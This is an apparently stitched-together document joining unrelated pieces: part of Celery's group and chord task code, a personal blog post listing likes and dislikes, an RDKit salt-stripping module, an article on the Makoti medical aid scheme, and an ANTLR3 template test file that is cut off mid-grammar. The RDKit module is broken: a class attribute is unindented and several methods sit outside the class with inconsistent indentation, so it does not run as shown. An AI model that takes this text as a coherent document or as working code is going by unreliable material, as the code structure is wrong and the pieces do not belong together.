                yield task, task.freeze(group_id=group_id, root_id=root_id)

    def _apply_tasks(self, tasks, producer=None, app=None, p=None,
                     add_to_parent=None, chord=None,
                     args=None, kwargs=None, **options):
        # pylint: disable=redefined-outer-name
        # XXX chord is also a class in outer scope.
        app = app or self.app
        with app.producer_or_acquire(producer) as producer:
            for sig, res in tasks:
                sig.apply_async(producer=producer, add_to_parent=False,
                                chord=sig.options.get('chord') or chord,
                                args=args, kwargs=kwargs,
                                **options)

                # adding callback to result, such that it will gradually
                # fulfill the barrier.
                #
                # Using barrier.add would use result.then, but we need
                # to add the weak argument here to only create a weak
                # reference to the object.
                if p and not p.cancelled and not p.ready:
                    p.size += 1
                    res.then(p, weak=True)
                yield res  # <-- r.parent, etc set in the frozen result.

    def _freeze_gid(self, options):
        # remove task_id and use that as the group_id,
        # if we don't remove it then every task will have the same id...
        options = dict(self.options, **options)
        options['group_id'] = group_id = (
            options.pop('task_id', uuid()))
        return options, group_id, options.get('root_id')

    def freeze(self, _id=None, group_id=None, chord=None,
               root_id=None, parent_id=None):
        # pylint: disable=redefined-outer-name
        # XXX chord is also a class in outer scope.
        opts = self.options
        try:
            gid = opts['task_id']
        except KeyError:
            gid = opts['task_id'] = uuid()
        if group_id:
            opts['group_id'] = group_id
        if chord:
            opts['chord'] = chord
        root_id = opts.setdefault('root_id', root_id)
        parent_id = opts.setdefault('parent_id', parent_id)
        new_tasks = []
        # Need to unroll subgroups early so that chord gets the
        # right result instance for chord_unlock etc.
        results = list(self._freeze_unroll(
            new_tasks, group_id, chord, root_id, parent_id,
        ))
        if isinstance(self.tasks, MutableSequence):
            self.tasks[:] = new_tasks
        else:
            self.tasks = new_tasks
        return self.app.GroupResult(gid, results)
    _freeze = freeze

    def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id):
        # pylint: disable=redefined-outer-name
        # XXX chord is also a class in outer scope.
        stack = deque(self.tasks)
        while stack:
            task = maybe_signature(stack.popleft(), app=self._app).clone()
            if isinstance(task, group):
                # flatten nested groups in place
                stack.extendleft(task.tasks)
            else:
                new_tasks.append(task)
                yield task.freeze(group_id=group_id,
                                  chord=chord, root_id=root_id,
                                  parent_id=parent_id)

    def __repr__(self):
        if self.tasks:
            return remove_repeating_from_task(
                self.tasks[0]['task'],
                'group({0.tasks!r})'.format(self))
        return 'group(<empty>)'

    def __len__(self):
        return len(self.tasks)

    @property
    def app(self):
        # Prefer the explicitly bound app, then the first task's app.
        app = self._app
        if app is None:
            try:
                app = self.tasks[0].app
            except LookupError:
                pass
        return app if app is not None else current_app
@Signature.register_type()
@python_2_unicode_compatible
class chord(Signature):
    r"""Barrier synchronization primitive.

    A chord consists of a header and a body.

    The header is a group of tasks that must complete before the callback is
    called.  A chord is essentially a callback for a group of tasks.

    The body is applied with the return values of all the header
    tasks as a list.

    Example:
        The chord:

        .. code-block:: pycon

            >>> res = chord([add.s(2, 2), add.s(4, 4)])(sum_task.s())

        is effectively :math:`\Sigma ((2 + 2) + (4 + 4))`:

        .. code-block:: pycon

            >>> res.get()
            12
    """

    @classmethod
    def from_dict(cls, d, app=None):
        # Rebuild a chord from its serialized (dict) representation.
        args, d['kwargs'] = cls._unpack_args(**d['kwargs'])
        return _upgrade(d, cls(*args, app=app, **d))

    @staticmethod
    def _unpack_args(header=None, body=None, **kwargs):
        # Python signatures are better at extracting keys from dicts
        # than manually popping things off.
        return (header, body), kwargs

    def __init__(self, header, body=None, task='celery.chord',
                 args=(), kwargs={}, app=None, **options):
        Signature.__init__(
            self, task, args,
            dict(kwargs=kwargs, header=_maybe_group(header, app),
                 body=maybe_signature(body, app=app)), app=app, **options
        )
        self.subtask_type = 'chord'

    def __call__(self, body=None, **options):
        return self.apply_async((), {'body': body} if body else {}, **options)

    def freeze(self, _id=None, group_id=None, chord=None,
               root_id=None, parent_id=None):
        # pylint: disable=redefined-outer-name
        # XXX chord is also a class in outer scope.
        if not isinstance(self.tasks, group):
            self.tasks = group(self.tasks, app=self.app)
        header_result = self.tasks.freeze(
            parent_id=parent_id, root_id=root_id, chord=self.body)
        bodyres = self.body.freeze(_id, root_id=root_id)
        # we need to link the body result back to the group result,
        # but the body may actually be a chain,
        # so find the first result without a parent
        node = bodyres
        seen = set()
        while node:
            if node.id in seen:
                raise RuntimeError('Recursive result parents')
            seen.add(node.id)
            if node.parent is None:
                node.parent = header_result
                break
            node = node.parent
        self.id = self.tasks.id
        return bodyres

    def apply_async(self, args=(), kwargs={}, task_id=None,
                    producer=None, publisher=None, connection=None,
                    router=None, result_cls=None, **options):
        kwargs = kwargs or {}
        args = (tuple(args) + tuple(self.args)
                if args and not self.immutable else self.args)
        body = kwargs.pop('body', None) or self.kwargs['body']
        kwargs = dict(self.kwargs['kwargs'], **kwargs)
        body = body.clone(**options)
        app = self._get_app(body)
        tasks = (self.tasks.clone() if isinstance(self.tasks, group)
                 else group(self.tasks, app=app))
        if app.conf.task_always_eager:
            return self.apply(args, kwargs,
                              body=body, task_id=task_id, **options)
        if len(self.tasks) == 1:
            # chord([A], B) can be optimized as A | B
            #  - Issue #3323
            return (self.tasks[0] | body).set(task_id=task_id).apply_async(
                args, kwargs, **options)

        # chord([A, B, ...], C)
        return self.run(tasks, body, args, task_id=task_id, **options)

    def apply(self, args=(), kwargs={}, propagate=True, body=None, **options):
        # Eager (local) execution: run the header, then the body with
        # the header's results as a list.
        body = self.body if body is None else body
        tasks = (self.tasks.clone() if isinstance(self.tasks, group)
                 else group(self.tasks, app=self.app))
        return body.apply(
            args=(tasks.apply(args, kwargs).get(propagate=propagate),),
        )

    def _traverse_tasks(self, tasks, value=None):
        # Walk the header, flattening nested groups; yields each leaf
        # task (or ``value`` when given, for counting).
        stack = deque(list(tasks))
        while stack:
            task = stack.popleft()
            if isinstance(task, group):
                stack.extend(task.tasks)
            else:
                yield task if value is None else value

    def __length_hint__(self):
        # Number of leaf tasks in the header.
        return sum(self._traverse_tasks(self.tasks, 1))

    def run(self, header, body, partial_args, app=None, interval=None,
            countdown=1, max_retries=None, eager=False,
            task_id=None, **options):
        app = app or self._get_app(body)
        group_id = header.options.get('task_id') or uuid()
        root_id = body.options.get('root_id')
        body.chord_size = self.__length_hint__()
        options = dict(self.options, **options) if options else self.options
        if options:
            options.pop('task_id', None)
            body.options.update(options)

        results = header.freeze(
            group_id=group_id, chord=body, root_id=root_id).results
        bodyres = body.freeze(task_id, root_id=root_id)

        parent = app.backend.apply_chord(
            header, partial_args, group_id, body,
            interval=interval, countdown=countdown,
            options=options, max_retries=max_retries,
            result=results)
        bodyres.parent = parent
        return bodyres

    def clone(self, *args, **kwargs):
        s = Signature.clone(self, *args, **kwargs)
        # need to make copy of body
        try:
            s.kwargs['body'] = maybe_signature(s.kwargs['body'], clone=True)
        except (AttributeError, KeyError):
            pass
        return s

    def link(self, callback):
        self.body.link(callback)
        return callback

    def link_error(self, errback):
        self.body.link_error(errback)
        return errback

    def set_immutable(self, immutable):
        # changes mutability of header only, not callback.
        for task in self.tasks:
            task.set_immutable(immutable)

    def __repr__(self):
        if self.body:
            if isinstance(self.body, _chain):
                return remove_repeating_from_task(
                    self.body.tasks[0]['task'],
                    '%({0} | {1!r})'.format(
                        self.body.tasks[0].reprcall(self.tasks),
                        chain(self.body.tasks[1:], app=self._app),
                    ),
                )
            return '%' + remove_repeating_from_task(
                self.body['task'], self.body.reprcall(self.tasks))
        return '<chord without body: {0.tasks!r}>'.format(self)

    @cached_property
    def app(self):
        return self._get_app(self.body)

    def _get_app(self, body=None):
        # Resolve the app from self, the header tasks, or the body.
        app = self._app
        if app is None:
            try:
                tasks = self.tasks.tasks  # is a group
            except AttributeError:
                tasks = self.tasks
            app = tasks[0]._app
            if app is None and body is not None:
                app = body._app
        return app if app is not None else current_app

    tasks = getitem_property('kwargs.header', 'Tasks in chord header.')
    body = getitem_property('kwargs.body', 'Body task of chord.')
def signature(varies, *args, **kwargs):
    """Create new signature.

    - if the first argument is a signature already then it's cloned.
    - if the first argument is a dict, then a Signature version is returned.

    Returns:
        Signature: The resulting signature.
    """
    if not isinstance(varies, dict):
        return Signature(varies, *args, **kwargs)
    if isinstance(varies, abstract.CallableSignature):
        # Already a signature object: return an independent copy.
        return varies.clone()
    # Plain dict: upgrade to the appropriate Signature subclass.
    return Signature.from_dict(varies, app=kwargs.get('app'))
subtask = signature  # noqa: E305 XXX compat
def maybe_signature(d, app=None, clone=False):
    """Ensure obj is a signature, or None.

    Arguments:
        d (Optional[Union[abstract.CallableSignature, Mapping]]):
            Signature or dict-serialized signature.
        app (celery.Celery):
            App to bind signature to.
        clone (bool):
            If *d* is already a signature, the signature
            will be cloned when this flag is enabled.

    Returns:
        Optional[abstract.CallableSignature]
    """
    if d is None:
        return None
    if isinstance(d, abstract.CallableSignature):
        if clone:
            d = d.clone()
    elif isinstance(d, dict):
        d = signature(d)
    if app is not None:
        d._app = app
    return d
maybe_subtask = maybe_signature  # noqa: E305 XXX compat
|
As the latest round of challenges in the blogging community, I have been nominated by Tonya from fourth generation farmgirl. Please take time to visit her fantastic blog, the photos are amazing and I always enjoy seeing how someone lives in a completely different environment than mine.
This challenge consists of listing ten things that I love and ten things that I hate, and nominating others to do the same.
2. Travel – anywhere, any place.
3. My doglets – my preciouses.
4. My work – I’m not kidding, I’m lucky to have a career that I love!
5. Hanging out at home – complete contrast to #2, but when I’m not travelling, I’m a real homebody.
6. Summer = warmth, sunshine and salads.
7. Disney – it’s my happy place – theme parks, resorts, cruise line… not so much the movies.
8. Laughing – I can see humour in practically any situation.
9. Socks – you can never have too many.
10. The Internet – it’s where I live my life. From paying bills online to communicating with friends, when I don’t have access, it’s like having a missing limb.
1. Poverty – so many live in grinding poverty around the world, while immense wealth is in the hands of others who have more than they need.
2. Winter – I live too far south, I seriously need to move to somewhere warmer. Or escape for the winter, one or the other.
4. Sexism & racism – to think anyone is less than equal to another due to the colour of their skin or their physical parts is completely inappropriate.
5. Cruelty to animals – anyone that mistreats an animal deserves the same to be done to them, likewise anyone that abuses a child.
6. Morons – not those with an intellectual disability, but those who don’t use their brains.
7. Those who don’t take responsibility for their own actions – if you are an adult, you have no one to blame for your choices and behaviours other than yourself.
8. Environment apathy – I don’t give a rat’s arse if you “believe” in “global warming” or not. But you cannot argue with the fact that humans are pillaging, polluting and overpopulating the planet.
9. Religious nutters – Westboro Baptist Church, ISIS – anyone that kills or incites violence in the name of religion really needs to go back to basics.
10. The media – between lack of investigative journalism, articles that appear to have been written by poorly trained monkeys, compounded with the need to blow things out of proportion and focus on the negative or petty… I won’t read it or watch it.
|
#
# Copyright (c) 2010, Novartis Institutes for BioMedical Research Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Created by Greg Landrum, Dec 2006
#
import os
import re
from collections import namedtuple
from contextlib import closing
from rdkit import Chem, RDConfig
from rdkit.Chem.rdmolfiles import SDMolSupplier, SmilesMolSupplier
class InputFormat:
  # Supported salt-definition input formats (used as string constants).
  SMARTS = 'smarts'
  MOL = 'mol'
  SMILES = 'smiles'
def _smartsFromSmartsLine(line):
  """
  Converts given line into a molecule using 'Chem.MolFromSmarts'.

  Blank lines and '//'-comment-only lines yield None; an unparsable
  SMARTS raises ValueError.
  """
  # Name the regular expression (better than inlining it)
  whitespace = re.compile(r'[\t ]+')
  # Reflects the specialisation of this method to read the rather unusual
  # SMARTS files with the // comments.
  payload = line.strip().split('//')[0]
  if not payload:
    return None
  token = whitespace.split(payload)[0]
  salt = Chem.MolFromSmarts(token)
  if salt is None:
    raise ValueError(payload)
  return salt
def _getSmartsSaltsFromStream(stream):
  """
  Yields extracted SMARTS salts from given stream.

  The stream is closed once iteration completes.
  """
  with closing(stream) as lines:
    for line in lines:
      salt = _smartsFromSmartsLine(line)
      if salt:
        yield salt
def _getSmartsSaltsFromFile(filename):
  """
  Extracts SMARTS salts from the file at *filename*.
  """
  stream = open(filename, 'r')
  # The stream helper takes ownership and closes the file when exhausted.
  return _getSmartsSaltsFromStream(stream)
class SaltRemover(object):
defnFilename = os.path.join(RDConfig.RDDataDir, 'Salts.txt')
  def __init__(self, defnFilename=None, defnData=None, defnFormat=InputFormat.SMARTS):
    # An explicit filename overrides the class-level default (Salts.txt).
    if defnFilename:
      self.defnFilename = defnFilename
    # Raw definition text; takes precedence over the file when provided.
    self.defnData = defnData
    self.salts = None
    self.defnFormat = defnFormat
    self._initPatterns()
  def _initPatterns(self):
    """Populate ``self.salts`` from ``defnData`` or the definition file.

    >>> remover = SaltRemover()
    >>> len(remover.salts)>0
    True

    Default input format is SMARTS

    >>> remover = SaltRemover(defnData="[Cl,Br]")
    >>> len(remover.salts)
    1

    >>> remover = SaltRemover(defnData="[Na+]\\nCC(=O)O", defnFormat=InputFormat.SMILES)
    >>> len(remover.salts)
    2

    >>> from rdkit import RDLogger
    >>> RDLogger.DisableLog('rdApp.error')
    >>> remover = SaltRemover(defnData="[Cl,fail]")
    Traceback (most recent call last):
      ...
    ValueError: [Cl,fail]

    >>> RDLogger.EnableLog('rdApp.error')
    """
    if self.defnData:
      from rdkit.six.moves import cStringIO as StringIO
      inF = StringIO(self.defnData)
      with closing(inF):
        self.salts = []
        for line in inF:
          if line:
            if self.defnFormat == InputFormat.SMARTS:
              salt = _smartsFromSmartsLine(line)
            elif self.defnFormat == InputFormat.SMILES:
              salt = Chem.MolFromSmiles(line)
            else:
              raise ValueError('Unsupported format for supplier.')
            if salt is None:
              raise ValueError(line)
            self.salts.append(salt)
    else:
      # No inline data: load salt definitions from the file instead.
      if self.defnFormat == InputFormat.SMARTS:
        self.salts = [mol for mol in _getSmartsSaltsFromFile(self.defnFilename)]
      elif self.defnFormat == InputFormat.MOL:
        self.salts = [mol for mol in SDMolSupplier(self.defnFilename)]
      elif self.defnFormat == InputFormat.SMILES:
        self.salts = [mol for mol in SmilesMolSupplier(self.defnFilename)]
      else:
        raise ValueError('Unsupported format for supplier.')
  def StripMol(self, mol, dontRemoveEverything=False):
    """Return *mol* with all matching salt fragments removed.

    >>> remover = SaltRemover(defnData="[Cl,Br]")
    >>> len(remover.salts)
    1

    >>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
    >>> res = remover.StripMol(mol)
    >>> res is not None
    True
    >>> res.GetNumAtoms()
    4

    Notice that all salts are removed:

    >>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Cl.Br')
    >>> res = remover.StripMol(mol)
    >>> res.GetNumAtoms()
    4

    Matching (e.g. "salt-like") atoms in the molecule are unchanged:

    >>> mol = Chem.MolFromSmiles('CN(Br)Cl')
    >>> res = remover.StripMol(mol)
    >>> res.GetNumAtoms()
    4

    >>> mol = Chem.MolFromSmiles('CN(Br)Cl.Cl')
    >>> res = remover.StripMol(mol)
    >>> res.GetNumAtoms()
    4

    Charged salts are handled reasonably:

    >>> mol = Chem.MolFromSmiles('C[NH+](C)(C).[Cl-]')
    >>> res = remover.StripMol(mol)
    >>> res.GetNumAtoms()
    4

    Watch out for this case (everything removed):

    >>> remover = SaltRemover()
    >>> len(remover.salts)>1
    True
    >>> mol = Chem.MolFromSmiles('CC(=O)O.[Na]')
    >>> res = remover.StripMol(mol)
    >>> res.GetNumAtoms()
    0

    dontRemoveEverything helps with this by leaving the last salt:

    >>> res = remover.StripMol(mol,dontRemoveEverything=True)
    >>> res.GetNumAtoms()
    4

    but in cases where the last salts are the same, it can't choose
    between them, so it returns all of them:

    >>> mol = Chem.MolFromSmiles('Cl.Cl')
    >>> res = remover.StripMol(mol,dontRemoveEverything=True)
    >>> res.GetNumAtoms()
    2
    """
    strippedMol = self._StripMol(mol, dontRemoveEverything)
    return strippedMol.mol
def StripMolWithDeleted(self, mol, dontRemoveEverything=False):
    """Strips given molecule and returns it, with the fragments which have been deleted.

    Returns a StrippedMol namedtuple (mol, deleted); `deleted` holds the
    salt patterns (from self.salts) that removed at least one fragment.

    >>> remover = SaltRemover(defnData="[Cl,Br]")
    >>> len(remover.salts)
    1

    >>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Br')
    >>> res, deleted = remover.StripMolWithDeleted(mol)
    >>> Chem.MolToSmiles(res)
    'CN(C)C'
    >>> [Chem.MolToSmarts(m) for m in deleted]
    ['[Cl,Br]']

    >>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
    >>> res, deleted = remover.StripMolWithDeleted(mol)
    >>> res.GetNumAtoms()
    4
    >>> len(deleted)
    1
    >>> deleted[0].GetNumAtoms()
    1
    >>> Chem.MolToSmiles(deleted[0])
    'Cl'

    Multiple occurrences of 'Cl' and without tuple destructuring

    >>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Cl')
    >>> tup = remover.StripMolWithDeleted(mol)
    >>> tup.mol.GetNumAtoms()
    4
    >>> len(tup.deleted)
    1
    >>> tup.deleted[0].GetNumAtoms()
    1
    >>> Chem.MolToSmiles(tup.deleted[0])
    'Cl'
    """
    # Fix: the final doctest previously read `Chem.MolToSmiles(deleted[0])`,
    # referencing the stale `deleted` variable left over from the earlier
    # example instead of `tup.deleted[0]` — it only passed because the
    # doctest namespace is shared.  The example is meant to demonstrate
    # access *without* tuple destructuring, so it must use `tup`.
    return self._StripMol(mol, dontRemoveEverything)
def _StripMol(self, mol, dontRemoveEverything=False):
    # Core implementation shared by StripMol / StripMolWithDeleted / __call__.
    # Returns a StrippedMol namedtuple (mol, deleted): the stripped molecule
    # plus the list of salt patterns that removed at least one fragment.

    def _applyPattern(m, salt, notEverything):
        # Repeatedly delete fragments of `m` matching `salt` until a pass
        # removes no atoms.  When `notEverything` is set, stop before the
        # deletion that would leave zero atoms (keeping the last fragment).
        nAts = m.GetNumAtoms()
        if not nAts:
            return m
        res = m

        t = Chem.DeleteSubstructs(res, salt, True)
        if not t or (notEverything and t.GetNumAtoms() == 0):
            return res
        res = t
        # Loop while the previous deletion made progress.
        while res.GetNumAtoms() and nAts > res.GetNumAtoms():
            nAts = res.GetNumAtoms()
            t = Chem.DeleteSubstructs(res, salt, True)
            if notEverything and t.GetNumAtoms() == 0:
                break
            res = t
        return res

    # NOTE(review): this namedtuple type is re-created on every call;
    # hoisting it to module level would be equivalent but cheaper.
    StrippedMol = namedtuple('StrippedMol', ['mol', 'deleted'])

    deleted = []
    # A single-fragment molecule cannot lose a fragment in this mode.
    if dontRemoveEverything and len(Chem.GetMolFrags(mol)) <= 1:
        return StrippedMol(mol, deleted)
    modified = False
    natoms = mol.GetNumAtoms()
    for salt in self.salts:
        mol = _applyPattern(mol, salt, dontRemoveEverything)
        if natoms != mol.GetNumAtoms():
            # This salt pattern removed something; record it.
            natoms = mol.GetNumAtoms()
            modified = True
            deleted.append(salt)
            if dontRemoveEverything and len(Chem.GetMolFrags(mol)) <= 1:
                break
    if modified and mol.GetNumAtoms() > 0:
        # Re-sanitize only when atoms were actually removed.
        Chem.SanitizeMol(mol)
    return StrippedMol(mol, deleted)
def __call__(self, mol, dontRemoveEverything=False):
    """
    >>> remover = SaltRemover(defnData="[Cl,Br]")
    >>> len(remover.salts)
    1
    >>> Chem.MolToSmiles(remover.salts[0])
    'Cl'

    >>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
    >>> res = remover(mol)
    >>> res is not None
    True
    >>> res.GetNumAtoms()
    4
    """
    # Calling the remover instance directly is shorthand for StripMol().
    return self.StripMol(mol, dontRemoveEverything=dontRemoveEverything)
# ------------------------------------
#
# doctest boilerplate
#
def _runDoctests(verbose=None):  # pragma: nocover
    """Runs this module's doctests and exits with the number of failures."""
    import doctest
    import sys
    failure_count, _test_count = doctest.testmod(optionflags=doctest.ELLIPSIS,
                                                 verbose=verbose)
    sys.exit(failure_count)


if __name__ == '__main__':  # pragma: nocover
    _runDoctests()
|
The Makoti medical aid aims to provide top medical cover at reasonable rates.
Members of the Makoti medical scheme select a doctor as their GP. Makoti will pay the costs for this doctor’s services to the member and dependants. Unless it is an emergency, the member and his dependants can then only use this GP, which the Makoti medical aid believes is beneficial to improved health care. According to Makoti medical aid, these benefits include the trust relationship that develops between doctor and patient, and the doctor getting to fully know the member’s health status and medical requirements.
What is Makoti medical aid?
Makoti medical aid offers two benefit options. The Makoti medical aid Primary Option covers unlimited primary health care from your chosen general practitioner. The option also covers acute and chronic medication, basic pathology and radiology. In addition, it covers ambulance services for medical emergencies, optometry and primary care dentistry benefits, and statutory prescribed minimum benefits.
The Makoti medical aid Comprehensive Option includes unlimited primary health care from the chosen general practitioner. It also includes cover for acute and chronic medication, hospitalisation including step-down care, specialist services, pathology and radiology. It also covers ambulance services for medical emergencies and statutory prescribed minimum benefits.
Optometry, dentistry and other services are provided by accredited Makoti medical aid providers.
Makoti medical aid is an open scheme, which means that members of the public can join it.
There are many medical aids in South Africa –Discovery medical aid, Makoti medical aid scheme, Momentum Health and Oxygen medical aid to mention just a few. When comparing all medical aids available to you, be critical! And you should consider the benefits a medical aid such as Makoti medical aid offers you.
For example, what is the extent of the medical cover, what are the limits on medical expenses, what are the conditions for claiming and, especially if you are older, what are the chronic benefits? Don’t be distracted by nice-to-haves. Instead, make sure the medical aid you choose is the best medical aid for your individual needs, and that it covers the health of your dependants. Be sure to request medical aid quotes from different medical aids. That ensures you find the most affordable scheme for your needs.
Makoti medical aid is an accredited scheme with the Council for Medical Schemes. The Council supervises the medical aid industry on behalf of the South African government. The extensive and very vital industry overseen by the Council for Medical Schemes has around 100 closed and open schemes, of which Makoti medical aid is one. The Council for Medical Schemes strives to ensure that the medical aid industry provides fair and equal access and services to the public. It achieves this by publishing information on all the medical aid schemes so that the public is fully informed of the benefits of the schemes, their obligations to the scheme, etc.
The Council for Medical Aid Schemes also operates as a type of ombudsman for the industry to ensure that complaints from members of medical schemes are addressed appropriately. It also provides a range of other services such as ensuring compliance with South Africa’s Medical Schemes Act, acting as an advisory body to South Africa’s Minister of Health and facilitating ongoing improvement to medical aid schemes and the way they operate.
|
import unittest
import textwrap
import antlr3
import antlr3.tree
import stringtemplate3
import testbase
import sys
import os
from StringIO import StringIO
class T(testbase.ANTLRTest):
    """Tests of ANTLR3's template output mode (output=template) for the
    Python target: inline templates, external StringTemplate groups,
    template actions, predicates, backtracking and rewrite mode."""

    def execParser(self, grammar, grammarEntry, input, group=None):
        """Compiles `grammar`, parses `input` starting at rule `grammarEntry`
        and returns the rendered template string (None if the rule produced
        no template).  `group` is an optional external StringTemplate group
        to attach to the parser."""
        lexerCls, parserCls = self.compileInlineGrammar(grammar)

        cStream = antlr3.StringStream(input)
        lexer = lexerCls(cStream)
        tStream = antlr3.CommonTokenStream(lexer)
        parser = parserCls(tStream)
        if group is not None:
            parser.templateLib = group
        result = getattr(parser, grammarEntry)()
        if result.st is not None:
            return result.st.toString()
        return None

    def testInlineTemplate(self):
        """A rule rewritten to an inline template literal."""
        grammar = textwrap.dedent(
            r'''grammar T;
options {
language=Python;
output=template;
}
a : ID INT
-> template(id={$ID.text}, int={$INT.text})
"id=<id>, int=<int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
            )

        found = self.execParser(
            grammar, 'a',
            "abc 34"
            )

        self.failUnlessEqual("id=abc, int=34", found)

    def testExternalTemplate(self):
        """A rule rewritten to a template defined in an external group."""
        templates = textwrap.dedent(
            '''\
group T;
expr(args, op) ::= <<
[<args; separator={<op>}>]
>>
'''
            )

        group = stringtemplate3.StringTemplateGroup(
            file=StringIO(templates),
            lexer='angle-bracket'
            )

        grammar = textwrap.dedent(
            r'''grammar T2;
options {
language=Python;
output=template;
}
a : r+=arg OP r+=arg
-> expr(op={$OP.text}, args={$r})
;
arg: ID -> template(t={$ID.text}) "<t>";
ID : 'a'..'z'+;
OP: '+';
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
            )

        found = self.execParser(
            grammar, 'a',
            "a + b",
            group
            )

        self.failUnlessEqual("[a+b]", found)

    def testEmptyTemplate(self):
        """An empty rewrite (->) yields no template at all."""
        grammar = textwrap.dedent(
            r'''grammar T;
options {
language=Python;
output=template;
}
a : ID INT
->
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
            )

        found = self.execParser(
            grammar, 'a',
            "abc 34"
            )

        self.failUnless(found is None)

    def testList(self):
        """A list label (r+=...) rendered with a separator."""
        grammar = textwrap.dedent(
            r'''grammar T;
options {
language=Python;
output=template;
}
a: (r+=b)* EOF
-> template(r={$r})
"<r; separator=\",\">"
;
b: ID
-> template(t={$ID.text}) "<t>"
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
            )

        found = self.execParser(
            grammar, 'a',
            "abc def ghi"
            )

        self.failUnlessEqual("abc,def,ghi", found)

    def testAction(self):
        """A rewrite to an arbitrary action building a StringTemplate."""
        grammar = textwrap.dedent(
            r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
-> { stringtemplate3.StringTemplate("hello") }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
            )

        found = self.execParser(
            grammar, 'a',
            "abc"
            )

        self.failUnlessEqual("hello", found)

    def testTemplateExpressionInAction(self):
        """Assigning $st from a %{...} template expression in an action."""
        grammar = textwrap.dedent(
            r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{ $st = %{"hello"} }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
            )

        found = self.execParser(
            grammar, 'a',
            "abc"
            )

        self.failUnlessEqual("hello", found)

    def testTemplateExpressionInAction2(self):
        """Setting a template attribute via %res.foo = ... syntax."""
        grammar = textwrap.dedent(
            r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{
res = %{"hello <foo>"}
%res.foo = "world";
}
-> { res }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
            )

        found = self.execParser(
            grammar, 'a',
            "abc"
            )

        self.failUnlessEqual("hello world", found)

    def testIndirectTemplateConstructor(self):
        """Instantiating a group template by name via %({"expr"})(...)."""
        templates = textwrap.dedent(
            '''\
group T;
expr(args, op) ::= <<
[<args; separator={<op>}>]
>>
'''
            )

        group = stringtemplate3.StringTemplateGroup(
            file=StringIO(templates),
            lexer='angle-bracket'
            )

        grammar = textwrap.dedent(
            r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{
$st = %({"expr"})(args={[1, 2, 3]}, op={"+"})
}
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
            )

        found = self.execParser(
            grammar, 'a',
            "abc",
            group
            )

        self.failUnlessEqual("[1+2+3]", found)

    def testPredicates(self):
        """Semantic predicates selecting among alternative templates."""
        grammar = textwrap.dedent(
            r'''grammar T3;
options {
language=Python;
output=template;
}
a : ID INT
-> {$ID.text=='a'}? template(int={$INT.text})
"A: <int>"
-> {$ID.text=='b'}? template(int={$INT.text})
"B: <int>"
-> template(int={$INT.text})
"C: <int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
            )

        found = self.execParser(
            grammar, 'a',
            "b 34"
            )

        self.failUnlessEqual("B: 34", found)

    def testBacktrackingMode(self):
        """Template output still works with backtrack=true and a syntactic
        predicate."""
        grammar = textwrap.dedent(
            r'''grammar T4;
options {
language=Python;
output=template;
backtrack=true;
}
a : (ID INT)=> ID INT
-> template(id={$ID.text}, int={$INT.text})
"id=<id>, int=<int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
            )

        found = self.execParser(
            grammar, 'a',
            "abc 34"
            )

        self.failUnlessEqual("id=abc, int=34", found)

    def testRewrite(self):
        """rewrite=true: templates patch the token stream in place,
        preserving whitespace and comments (checked via
        TokenRewriteStream.toString())."""
        grammar = textwrap.dedent(
            r'''grammar T5;
options {
language=Python;
output=template;
rewrite=true;
}
prog: stat+;
stat
: 'if' '(' expr ')' stat
| 'return' return_expr ';'
| '{' stat* '}'
| ID '=' expr ';'
;
return_expr
: expr
-> template(t={$text}) <<boom(<t>)>>
;
expr
: ID
| INT
;
ID: 'a'..'z'+;
INT: '0'..'9'+;
WS: (' '|'\n')+ {$channel=HIDDEN;} ;
COMMENT: '/*' (options {greedy=false;} : .)* '*/' {$channel = HIDDEN;} ;
